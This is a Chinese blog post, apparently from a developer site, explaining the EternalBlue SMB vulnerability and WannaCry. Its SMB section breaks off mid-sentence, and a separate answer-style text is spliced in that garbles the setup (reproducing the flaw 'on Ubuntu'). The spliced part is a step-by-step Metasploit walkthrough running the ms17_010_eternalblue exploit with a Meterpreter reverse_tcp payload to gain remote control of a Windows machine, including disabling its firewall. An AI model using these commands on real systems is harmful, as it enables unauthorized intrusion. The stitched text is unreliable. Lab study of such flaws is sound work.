可刑又可拷!永恒之蓝漏洞原理及复现

 

一.永恒之蓝介绍

1.什么是永恒之蓝

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。

2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.SMB协议介绍。

SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API),一般端口使用为139,445。

3.SMB会话生命阶段。

1) SMB协议协商(Negotiate)

在一个SMB还没有开始的时候,由客户端率先发出一个协商请求。在请求中,客户端会列出所有它所支持协议版本以及所

永恒之蓝(EternalBlue)是一个严重的安全漏洞,最初由美国国家安全局(NSA)发现,后来被黑客组织Shadow Brokers泄露。永恒之蓝利用了Windows SMB服务中的一个漏洞,允许攻击者远程执行代码。为了复现永恒之蓝漏洞在Ubuntu系统上的影响,通常需要设置一个实验环境。以下是复现永恒之蓝漏洞的基本步骤: ### 环境准备 1. **安装虚拟机**:使用VirtualBox或VMware安装两台虚拟机,一台运行Ubuntu,另一台运行Windows(建议使用Windows 7或Windows Server 2008,因为这些版本更容易受到永恒之蓝攻击)。 2. **网络配置**:确保两台虚拟机在同一局域网内,可以互相通信。 ### 步骤 1. **安装必要的软件**: - 在Ubuntu上安装Metasploit框架: ```bash sudo apt update sudo apt install metasploit-framework ``` - 在Windows虚拟机上禁用防火墙和防病毒软件,以确保攻击能够成功。 2. **启动Metasploit**: ```bash msfconsole ``` 3. **搜索永恒之蓝模块**: ```bash search eternalblue ``` 4. **使用永恒之蓝模块**: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` 5. **设置目标IP和本地IP**: ```bash set RHOST <Windows虚拟机IP> set LHOST <Ubuntu虚拟机IP> ``` 6. **选择Payload**: ```bash set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 7. **执行攻击**: ```bash exploit ``` ### 结果 如果攻击成功,你将获得一个Meterpreter会话,可以远程执行命令和控制目标Windows系统。 ### 注意事项 - **法律和道德**:复现漏洞仅用于学习和研究目的,禁止在未经授权的系统上使用。 - **安全性**:在实际环境中,确保系统已安装最新的安全补丁,以防止此类漏洞被利用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值